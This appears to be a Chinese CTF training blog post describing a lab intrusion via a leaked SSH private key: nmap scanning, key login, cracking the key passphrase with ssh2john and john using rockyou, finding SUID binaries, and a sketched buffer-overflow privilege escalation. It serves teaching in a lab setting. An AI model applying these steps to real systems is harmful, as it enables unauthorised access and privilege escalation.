CTF入门训练:SSH私钥泄漏渗透

1.扫描靶机开放的服务

nmap -sV 192.168.2.109

2.使用私钥登录靶机

#ssh -i 私匙 用户名/id
ssh -i id_rsa simon@192.168.2.109

3.解密私钥

#把私钥文件转为john可读,无法直接使用ssh2john时,使用locate查找
locate ssh2john
ssh2john id_rsa > rsacrack
#zcat解压kali密码字典破解rsacrack文件
zcat /user/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack

4.查找需要root权限的文件

#-prem -4000 SUID
#/dev/null 避免错误输出
find / -perm -4000 2>/dev/null

5.缓冲区溢出提权
源码中20字节缓冲区
缓冲区
输入20字节+/bin/sh
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值